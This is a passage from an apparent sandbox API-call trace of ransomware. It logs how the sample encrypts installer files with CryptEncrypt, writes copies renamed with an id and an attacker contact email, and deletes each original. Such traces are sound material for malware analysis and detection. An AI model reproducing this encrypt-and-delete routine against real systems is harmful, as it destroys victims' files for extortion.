nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x1ad0, lpOverlapped=0x0) returned 1 [0046.540] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0046.540] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.540] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.540] CryptDestroyKey (hKey=0xf71a00) returned 1 [0046.540] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.541] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0046.541] CloseHandle (hObject=0x32c) returned 1 [0046.541] CloseHandle (hObject=0x300) returned 1 [0046.541] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 1 [0046.542] SetEvent (hEvent=0x2e8) returned 1 [0046.542] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.542] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.543] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=72076) returned 1 [0046.543] CloseHandle (hObject=0x300) returned 1 [0046.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 0x80 [0046.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.543] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.543] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.544] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.544] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.544] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71dc0) returned 1 [0046.544] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.544] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x1198c, lpOverlapped=0x0) returned 1 [0046.546] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11990, dwBufLen=0x11990 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11990) returned 1 [0046.547] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11990, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11990, lpOverlapped=0x0) returned 1 [0046.548] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72100) returned 1 [0046.548] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.548] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.548] CryptDestroyKey (hKey=0xf72100) returned 1 [0046.548] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.548] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0046.548] CloseHandle (hObject=0x300) returned 1 [0046.548] CloseHandle (hObject=0x32c) returned 1 [0046.551] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 1 [0046.552] SetEvent (hEvent=0x2e8) returned 1 [0046.552] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.552] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.553] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=16728) returned 1 [0046.553] CloseHandle (hObject=0x32c) returned 1 [0046.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 0x80 [0046.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.554] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.554] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.554] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.554] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.554] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f40) returned 1 [0046.554] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.554] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4158, lpOverlapped=0x0) returned 1 [0046.555] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4160, dwBufLen=0x4160 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4160) returned 1 [0046.555] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4160, lpOverlapped=0x0) returned 1 [0046.557] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b40) returned 1 [0046.557] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.557] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.557] CryptDestroyKey (hKey=0xf71b40) returned 1 [0046.557] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.557] CryptDestroyKey (hKey=0xf71f40) returned 1 [0046.557] CloseHandle (hObject=0x32c) returned 1 [0046.557] CloseHandle (hObject=0x300) returned 1 [0046.558] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 1 [0046.558] SetEvent (hEvent=0x2e8) returned 1 [0046.559] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.559] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.559] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=4254) returned 1 [0046.559] CloseHandle (hObject=0x300) returned 1 [0046.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 0x80 [0046.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.559] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.559] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.559] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.559] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.561] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b40) returned 1 [0046.561] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.561] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x109e, lpOverlapped=0x0) returned 1 [0046.772] CryptEncrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x10a0, dwBufLen=0x10a0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x10a0) returned 1 [0046.772] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x10a0, lpOverlapped=0x0) returned 1 [0046.773] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0046.773] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.773] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.773] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.773] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.773] CryptDestroyKey (hKey=0xf71b40) returned 1 [0046.773] CloseHandle (hObject=0x300) returned 1 [0046.773] CloseHandle (hObject=0x32c) returned 1 [0046.774] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 1 [0046.774] SetEvent (hEvent=0x2e8) returned 1 [0046.775] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.775] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.775] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=10125) returned 1 [0046.775] CloseHandle (hObject=0x32c) returned 1 [0046.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 0x80 [0046.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.775] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.775] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.775] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.775] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.777] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f40) returned 1 [0046.777] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.777] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x278d, lpOverlapped=0x0) returned 1 [0046.778] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x2790, dwBufLen=0x2790 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x2790) returned 1 [0046.778] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x2790, lpOverlapped=0x0) returned 1 [0046.779] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c40) returned 1 [0046.779] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.779] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0046.779] CryptDestroyKey (hKey=0xf71c40) returned 1 [0046.779] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0046.779] CryptDestroyKey (hKey=0xf71f40) returned 1 [0046.779] CloseHandle (hObject=0x32c) returned 1 [0046.780] CloseHandle (hObject=0x300) returned 1 [0046.780] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 1 [0046.781] SetEvent (hEvent=0x2e8) returned 1 [0046.781] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.781] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.781] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=68226) returned 1 [0046.781] CloseHandle (hObject=0x300) returned 1 [0046.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 0x80 [0046.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.782] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.782] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.782] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.782] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.782] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d80) returned 1 [0046.782] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.782] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x10a82, lpOverlapped=0x0) returned 1 [0046.784] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x10a90, dwBufLen=0x10a90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x10a90) returned 1 [0046.784] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x10a90, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x10a90, lpOverlapped=0x0) returned 1 [0046.786] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72140) returned 1 [0046.787] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.787] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.787] CryptDestroyKey (hKey=0xf72140) returned 1 [0046.787] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.787] CryptDestroyKey (hKey=0xf71d80) returned 1 [0046.787] CloseHandle (hObject=0x300) returned 1 [0046.787] CloseHandle (hObject=0x32c) returned 1 [0046.788] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 1 [0046.789] SetEvent (hEvent=0x2e8) returned 1 [0046.790] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.790] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=15704) returned 1 [0046.790] CloseHandle (hObject=0x32c) returned 1 [0046.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 0x80 [0046.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.790] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.790] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.790] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71bc0) returned 1 [0046.790] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.790] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x3d58, lpOverlapped=0x0) returned 1 [0046.792] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, 